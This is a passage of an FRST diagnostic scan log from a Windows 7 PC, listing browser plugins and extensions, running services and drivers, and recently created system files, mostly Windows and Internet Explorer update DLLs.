FF Plugin HKU\S-1-5-21-3698744866-2675293530-421701469-1001: @facebook.com/FBPlugin,version=1.0.3 -> C:\Users\KEKLR\AppData\Roaming\Facebook\npfbplugin_1_0_3.dll [2010-06-09] ( )
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMozCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2017-02-17] (Adobe Systems Inc.)

Chrome:
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> hxxp://www.google.com
CHR StartupUrls: Default -> "hxxp://www.google.com"
CHR Profile: C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default [2016-12-26]
CHR Extension: (Chrome Web Store Payments) - C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-07-07]
CHR Extension: (Chrome Media Router) - C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-11-22]
CHR HKLM-x32\...\Chrome\Extension: [jkfpchpiljkaemlpmpebnglgkomamfeo] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AESTFilters; C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_960c1f056a541068\AESTSr64.exe [89600 2009-03-02] (Andrea Electronics Corporation)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3737792 2017-03-26] (Microsoft Corporation)
R2 EpsonCustomerResearchParticipation; C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe [677376 2016-08-02] (SEIKO EPSON CORPORATION)
R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [144560 2012-05-17] (Seiko Epson Corporation)
R2 EPSON_PM_RPCV4_06; C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S60RPB.EXE [152640 2013-04-15] (SEIKO EPSON CORPORATION)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [31776 2016-12-07] (HP Inc.)
R2 kss; C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe [919296 2015-06-03] (Kaspersky Lab ZAO)
R2 LightScribeService; C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2009-11-20] (Hewlett-Packard Company) [File not signed]
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [119864 2016-11-14] (Microsoft Corporation)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2008-12-03] (Hewlett-Packard) [File not signed]
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-11-14] (Microsoft Corporation)
S3 ose; C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE [198192 2017-03-25] (Microsoft Corporation) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2008-12-03] (Hewlett-Packard) [File not signed]
R2 RichVideo; C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe [247152 2009-01-21] ()
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
R2 STacSV; C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_960c1f056a541068\STacSV64.exe [247808 2010-03-23] (IDT, Inc.)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-13] (Microsoft Corporation)
S3 dg_ssudbus; C:\Windows\System32\DRIVERS\ssudbus.sys [130688 2016-07-22] (Samsung Electronics Co., Ltd.)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [192216 2017-04-08] (Malwarebytes)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
R3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
S3 npf; C:\Windows\System32\drivers\npf.sys [36600 2014-08-18] (Riverbed Technology, Inc.)
R0 pavboot; C:\Windows\System32\drivers\pavboot64.sys [33800 2009-06-30] (Panda Security, S.L.)
S3 ssudmdm; C:\Windows\System32\DRIVERS\ssudmdm.sys [164992 2016-07-22] (Samsung Electronics Co., Ltd.)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U4 eabfiltr; no ImagePath
S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-08 14:10 - 2017-04-08 14:11 - 00030783 _____ C:\Users\KEKLR\Downloads\FRST.txt
2017-04-08 14:06 - 2017-04-08 14:10 - 02424832 _____ (Farbar) C:\Users\KEKLR\Downloads\FRST64 (1).exe
2017-04-08 14:06 - 2017-04-08 14:10 - 00000000 ____D C:\FRST
2017-04-08 13:59 - 2017-04-08 13:59 - 02424832 _____ (Farbar) C:\Users\KEKLR\Downloads\FRST64.exe
2017-04-08 13:47 - 2017-04-08 13:49 - 00000003 _____ C:\Users\KEKLR\Documents\malwarescann 4.8.2017 2.txt
2017-04-08 10:51 - 2016-08-22 15:20 - 00332512 _____ (Trend Micro Inc.) C:\Windows\system32\Drivers\tmcomm.sys
2017-04-08 10:39 - 2017-04-08 12:42 - 00000003 _____ C:\Users\KEKLR\Documents\malwarescann 4.8.2017.txt
2017-03-15 19:42 - 2017-03-04 13:24 - 00394448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2017-03-15 19:42 - 2017-03-04 12:39 - 00346320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2017-03-15 19:42 - 2017-03-04 04:20 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2017-03-15 19:42 - 2017-03-04 04:20 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2017-03-15 19:42 - 2017-03-04 04:02 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2017-03-15 19:42 - 2017-03-04 04:01 - 00576512 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2017-03-15 19:42 - 2017-03-04 04:01 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2017-03-15 19:42 - 2017-03-04 04:01 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2017-03-15 19:42 - 2017-03-04 04:01 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2017-03-15 19:42 - 2017-03-04 03:59 - 02895360 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2017-03-15 19:42 - 2017-03-04 03:52 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2017-03-15 19:42 - 2017-03-04 03:51 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2017-03-15 19:42 - 2017-03-04 03:48 - 25746944 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-03-15 19:42 - 2017-03-04 03:46 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2017-03-15 19:42 - 2017-03-04 03:45 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2017-03-15 19:42 - 2017-03-04 03:45 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2017-03-15 19:42 - 2017-03-04 03:45 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2017-03-15 19:42 - 2017-03-04 03:44 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2017-03-15 19:42 - 2017-03-04 03:36 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2017-03-15 19:42 - 2017-03-04 03:32 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2017-03-15 19:42 - 2017-03-04 03:31 - 06045696 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-03-15 19:42 - 2017-03-04 03:23 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2017-03-15 19:42 - 2017-03-04 03:21 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2017-03-15 19:42 - 2017-03-04 03:16 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2017-03-15 19:42 - 2017-03-04 03:16 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2017-03-15 19:42 - 2017-03-04 03:13 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2017-03-15 19:42 - 2017-03-04 03:11 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2017-03-15 19:42 - 2017-03-04 02:57 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2017-03-15 19:42 - 2017-03-04 02:55 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2017-03-15 19:42 - 2017-03-04 02:54 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2017-03-15 19:42 - 2017-03-04 02:52 - 02131456 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2017-03-15 19:42 - 2017-03-04 02:52 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2017-03-15 19:42 - 2017-03-04 02:26 - 15259648 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-03-15 19:42 - 2017-03-04 02:25 - 03241984 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2017-03-15 19:42 - 2017-03-04 02:12 - 01545728 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2017-03-15 19:42 - 2017-03-04 02:02 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2017-03-15 19:42 - 2017-03-04 00:18 - 20281856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2017-03-15 19:42 - 2017-03-02 14:16 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2017-03-15 19:42 - 2017-03-02 14:02 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2017-03-15 19:42 - 2017-03-02 14:01 - 00499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2017-03-15 19:42 - 2017-03-02 14:01 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2017-03-15 19:42 - 2017-03-02 14:01 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2017-03-15 19:42 - 2017-03-02 14:00 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2017-03-15 19:42 - 2017-03-02 13:55 - 02287104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2017-03-15 19:42 - 2017-03-02 13:54 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2017-03-15 19:42 - 2017-03-02 13:53 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2017-03-15 19:42 - 2017-03-02 13:51 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2017-03-15 19:42 - 2017-03-02 13:50 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2017-03-15 19:42 - 2017-03-02 13:49 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2017-03-15 19:42 - 2017-03-02 13:49 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2017-03-15 19:42 - 2017-03-02 13:41 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2017-03-15 19:42 - 2017-03-02 13:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2017-03-15 19:42 - 2017-03-02 13:35 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2017-03-15 19:42 - 2017-03-02 13:32 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2017-03-15 19:42 - 2017-03-02 13:31 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2017-03-15 19:42 - 2017-03-02 13:29 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2017-03-15 19:42 - 2017-03-02 13:28 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2017-03-15 19:42 - 2017-03-02 13:22 - 04604416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2017-03-15 19:42 - 2017-03-02 13:21 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2017-03-15 19:42 - 2017-03-02 13:19 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2017-03-15 19:42 - 2017-03-02 13:17 - 02055680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2017-03-15 19:42 - 2017-03-02 13:17 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2017-03-15 19:42 - 2017-03-02 13:11 - 13654528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2017-03-15 19:42 - 2017-03-02 12:53 - 02767360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2017-03-15 19:42 - 2017-03-02 12:50 - 01312768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2017-03-15 19:42 - 2017-03-02 12:50 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2017-03-15 19:42 - 2017-02-11 11:58 - 00462848 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2017-03-15 19:42 - 2017-02-11 11:58 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2017-03-15 19:42 - 2017-02-11 11:58 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2017-03-15 19:42 - 2017-02-10 12:32 - 00803328 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
2017-03-15 19:42 - 2017-02-10 12:32 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2017-03-15 19:42 - 2017-02-10 12:17 - 00628736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usp10.dll
2017-03-15 19:42 - 2017-02-10 12:17 - 00312832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2017-03-15 19:42 - 2017-02-10 10:33 - 01251328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2017-03-15 19:42 - 2017-02-09 12:36 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2017-03-15 19:42 - 2017-02-09 12:35 - 05548264 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2017-03-15 19:42 - 2017-02-09 12:35 - 00706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2017-03-15 19:42 - 2017-02-09 12:35 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2017-03-15 19:42 - 2017-02-09 12:35 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2017-03-15 19:42 - 2017-02-09 12:33 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00040960 _____ (Microsoft Corporation) C:\Windows\system32\WcsPlugInService.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 01460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00625664 _____ (Microsoft Corporation) C:\Windows\system32\mscms.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00250880 _____ (Microsoft Corporation) C:\Windows\system32\icm32.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00123904 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:19 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2017-03-15 19:42 - 2017-02-09 12:19 - 03945192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2017-03-15 19:42 - 2017-02-09 12:16 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00481792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscms.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00215040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icm32.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
